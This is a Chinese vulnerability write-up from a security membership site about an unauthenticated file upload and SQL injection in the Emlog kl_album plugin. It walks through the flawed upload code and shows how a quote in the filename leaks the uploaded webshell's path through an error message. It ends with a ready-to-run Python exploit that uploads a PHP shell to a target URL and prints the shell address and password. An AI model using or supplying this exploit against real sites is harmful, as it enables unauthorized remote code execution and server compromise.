Emlog_相册插件前台SQL注入+Getshell

040

# Emlog 相册插件前台SQL注入+Getshell

==================================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

### 漏洞分析

首先安装Emlog的相册的插件

![](/static/qingy/Emlog_相册插件前台SQL注入+Getshell/img/rId25.png)

安装之后可以在目录:emlog\\src\\content\\plugins\\kl\_album下找到所有的安装文件:

![](/static/qingy/Emlog_相册插件前台SQL注入+Getshell/img/rId26.png)

之后我们分析Kl-album\_ajax\_do.php文件

query(“INSERT INTO “.DB_PREFIX.”kl_album(truename, filename, description, album, addtime, w, h) VALUES(‘{$_FILES[‘Filedata’][‘name’]}’, ‘{$upfname}’, ‘”.date(‘Y-m-d’, time()).”‘, {$album}, “.time().”, {$photo_size[‘w’]}, {$photo_size[‘h’]})”);
if($result){
$new_id = $DB->insert_id();
$the_option_value = Option::get(‘kl_album_’.$album);
if($the_option_value !== null){
$the_option_value = trim($new_id.’,’.$the_option_value, ‘,’);
Option::updateOption(‘kl_album_’.$album, $the_option_value);
$CACHE->updateCache(‘options’);
}
}
}
exit;
}
if(ROLE != ‘admin’) exit(‘access deined!’);

根据上面的代码,我们可以看到验证身份的代码在上传文件的后面,所以任意用户可以实现文件上传,那么之后我们再看看上传部分看看到底是如何进行验证或者对文件进行过滤的,这里面定义了一个\$att\_type
= array(\’jpg\’, \’jpeg\’, \’png\’, \’gif\’);,并且将\$att\_type
这个变量和\$\_FILE一起传入了kl\_album\_upload\_file函数

unction kl_album_upload_file($filename, $errorNum, $tmpfile, $filesize, $filetype, $type, $isIcon = 0){
$kl_album_config = unserialize(Option::get(‘kl_album_config’));
$extension = strtolower(substr(strrchr($filename, “.”),1));
$uppath = KL_UPLOADFILE_PATH . date(“Ym”) . “/”;
$fname = md5($filename) . date(“YmdHis”) . rand() .’.’. $extension;
$attachpath = $uppath . $fname;
if(!is_dir(KL_UPLOADFILE_PATH)){
umask(0);
$ret = @mkdir(KL_UPLOADFILE_PATH, 0777);
if($ret === false) return ‘创建文件上传目录失败’;
}
if(!is_dir($uppath)){
umask(0);
$ret = @mkdir($uppath, 0777);
if($ret === false) return “上传失败。文件上传目录(content/plugins/kl_album/upload)不可写”;
}
doAction(‘kl_album_upload’, $tmpfile);
//缩略
$imtype = array(‘jpg’,’png’,’jpeg’,’gif’);
$thum = $uppath.”thum-“. $fname;
$attach = in_array($extension, $imtype) && function_exists(“ImageCreate”) && kl_album_resize_image($tmpfile,$filetype,$thum,$isIcon,KL_IMG_ATT_MAX_W,KL_IMG_ATT_MAX_H) ? $thum : $attachpath;
$kl_album_compression_length = isset($kl_album_config[‘compression_length’]) ? intval($kl_album_config[‘compression_length’]) : 1024;
$kl_album_compression_width = isset($kl_album_config[‘compression_width’]) ? intval($kl_album_config[‘compression_width’]) : 768;
if($kl_album_compression_length == 0 || $kl_album_compression_width == 0){
if(@is_uploaded_file($tmpfile)){
if(@!move_uploaded_file($tmpfile ,$attachpath)){
@unlink($tmpfile);
return “上传失败。文件上传目录(content/plugins/kl_album/upload)不可写”;
}else{
echo ‘kl_album_successed’;
}
chmod($attachpath, 0777);
}
}else{
if(in_array($extension, $imtype) && function_exists(“ImageCreate”) && kl_album_resize_image($tmpfile,$filetype,$attachpath,$isIcon,$kl_album_compression_length,$kl_album_compression_width)){
echo ‘kl_album_successed’;
}else{
if(@is_uploaded_file($tmpfile)){
if(@!move_uploaded_file($tmpfile ,$attachpath)){
@unlink($tmpfile);
return “上传失败。文件上传目录(content/plugins/kl_album/upload)不可写”;
}else{
echo ‘kl_album_successed’;
}
chmod($attachpath, 0777);
}
}
}
$attach = substr($attach, 6, strlen($attach));
return $attach;
}

从上面的代码中我们发现,对于之前传入的\$\_type这个变量在这个函数里根本就没有起到任何左右,函数中定义的\$imtype
=
array(\’jpg\’,\’png\’,\’jpeg\’,\’gif\’);,也不是用来验证后缀的,而是判断是否需要生成缩略图的,所以重点就是下面的内容了:

$extension = strtolower(substr(strrchr($filename, “.”),1));
$uppath = KL_UPLOADFILE_PATH . date(“Ym”) . “/”;
$fname = md5($filename) . date(“YmdHis”) . rand() .’.’. $extension;
$attachpath = $uppath . $fname;



if(@!move_uploaded_file($tmpfile ,$attachpath)){

这里我们可以发现上传的文件名是:

$fname = md5($filename) . date(“YmdHis”) . rand() .’.’. $extension;

这里的意思是将原来的文件名的md5值+当前时间+rand随机数+后缀,md5值和时间基本上比较好确定,但是这个rand()随机数一般都是0-65535之间,非常麻烦。

同时我们可以看到下面的代码,并没有把问卷名输出的地方,只是echo
\’kl\_album\_successed\’;。难道,我们需要暴力破解shell名字?

我们返回kl\_album\_ajax\_do.php,可以发现上传的if语句中有如下代码:

$result = $DB->query(“INSERT INTO “.DB_PREFIX.”kl_album(truename, filename, description, album, addtime, w, h) VALUES(‘{$_FILES[‘Filedata’][‘name’]}’, ‘{$upfname}’, ‘”.date(‘Y-m-d’, time()).”‘, {$album}, “.time().”, {$photo_size[‘w’]}, {$photo_size[‘h’]})”);

这里将\$\_FILES\[\’Filedata\’\]\[\’name\’\]直接插入数据库。这里另造成了一个SQL注入漏洞,当然既然有之前的getshell,这里的注入就有点当陪衬了。不过emlog在遇到SQL语句出错的情况下是会报错的。所以所以,这里我们正好用到这个特性,通过报错可以将\$upfname这个字段爆出来,这也就是我们上传成功的shell名字。如何报错?上传文件名里加个单引号即可。

### 漏洞复现

target url >

shell file >

保存为html,本地打开:

![](/static/qingy/Emlog_相册插件前台SQL注入+Getshell/img/rId28.png)

填入目标url,并选择要上传的shell。(如图,我这里是info\’.php,会令SQL出错)。点击GO!

之后可以发现出错了,可以发现文件名已经爆出来了:../content/plugins/kl\_album/upload/201411/38493d4468377f721357e9c64f93637d2014111211381611097.php访问可见shell:

![](/static/qingy/Emlog_相册插件前台SQL注入+Getshell/img/rId29.png)

这里给出独自等待的一份payload:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2015/4/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import sys, os, re, time

try:
import requests
except ImportError:
raise SystemExit(‘\n[!] requests模块导入错误,请执行pip install requests安装!’)
def usage():
# os.system([‘clear’, ‘cls’][os.name == ‘nt’])
print ‘+’ + ‘-‘ * 60 + ‘+’
print ‘\t Python emlog相册插件getshell exploit’
print ‘\t Blog:http://www.waitalone.cn/’
print ‘\t\t Code BY: 独自等待’
print ‘\t\t Time:2015-04-30’
print ‘+’ + ‘-‘ * 60 + ‘+’
if len(sys.argv) != 2:
print ‘用法: ‘ + os.path.basename(sys.argv[0]) + ‘ EMLOG 网站地址’
print ‘实例: ‘ + os.path.basename(sys.argv[0]) + ‘ http://www.waitalone.cn/’
sys.exit()
def getshell(url):
”’
emlog相册插件上传getshell函数
:param url: emlog url地址
:return: 返回得到的shell地址
”’
up_url = url + ‘content/plugins/kl_album/kl_album_ajax_do.php’
shell = “
filename = “oneok’.php”
with open(filename, ‘wb’) as shellok:
shellok.write(shell)
files = {
‘Filedata’: (filename, open(filename, ‘rb’), ‘text/json’),
‘album’: (None, ‘waitalone.cn’)
}
try:
up_res = requests.post(up_url, files=files).content
shellok = re.findall(re.compile(r'(?<=\.\./).+?(?=\',)'), up_res) except Exception, msg: print '\n[x] 发生错误了,卧槽!!!:', msg else: if shellok: return url + shellok[0] if __name__ == '__main__': usage() start = time.time() url = sys.argv[1] if url[-1] != '/': url += '/' ok = getshell(url) try: os.remove('oneok\'.php') except Exception: print '\n[x] 删除临时文件失败,请手工删除!' if ok: print '\n[!] 爷,人品暴发了,成功得到Shell:\n\n%s 密码:%s' % (ok, 'hstsec') else: print '\n[x] 报告大爷,本站不存在此漏洞!' print '\n报告爷,脚本执行完毕,用时:', time.time() - start, '秒!' 四、参考链接 ------------ > https://blog.csdn.net/Fly\_hps/article/details/80582751

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20240920版本)-棉花糖会员站
会员必看手册(20240920版本)
会员必看手册(20240920版本)
9月20日 1.4W+
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 3034
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
9月29日 2984
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2313
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2171
钟北山SRC第七、八、九期-棉花糖会员站
钟北山SRC第七、八、九期
钟北山SRC第七、八、九期
5月9日 2111
相关推荐
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
6月1日 1024
Fastadmin框架lang任意文件读取-棉花糖会员站
Fastadmin框架lang任意文件读取
Fastadmin框架lang任意文件读取
6月16日 553
金蝶 EAS 反序列化 RCE-棉花糖会员站
金蝶 EAS 反序列化 RCE
金蝶 EAS 反序列化 RCE
10月11日 551
投稿:多个poc-棉花糖会员站
投稿:多个poc
投稿:多个poc
10月19日 540
eking管理易Html5Upload接口 任意文件上传-棉花糖会员站
eking管理易Html5Upload接口 任意文件上传
eking管理易Html5Upload接口 任意文件上传
10月16日 519
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加-棉花糖会员站
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
10月11日 513
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
湖南强智教务管理系统存在 任意文件下载
关于“漏洞管理”的相关文档
三篇工控安全相关文档/报告
一些别人的CNVD报告
用友U8-CRM系统fillbacksetting.php SQL注入
用友GRP A Cloud 政府财务云rectifyAuditGaDoubt反序列化远程代码执行
最近一周热门文章

1一些别人的CNVD报告

棉花糖的头像-棉花糖会员站年费会员10月20日
9999797

2外面流传的2024小迪99集残缺版

棉花糖的头像-棉花糖会员站年费会员10月17日
9999555

3投稿:多个poc

Dylan的头像-棉花糖会员站年费会员10月19日
10540

4eking管理易Html5Upload接口 任意文件上传

棉花糖的头像-棉花糖会员站年费会员10月16日
9999519

5数字化校园系统-RzptManage-文件上传

棉花糖的头像-棉花糖会员站年费会员10月20日
9999504

6湖南强智教务管理系统存在 任意文件下载

棉花糖的头像-棉花糖会员站年费会员10月21日
9999502
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密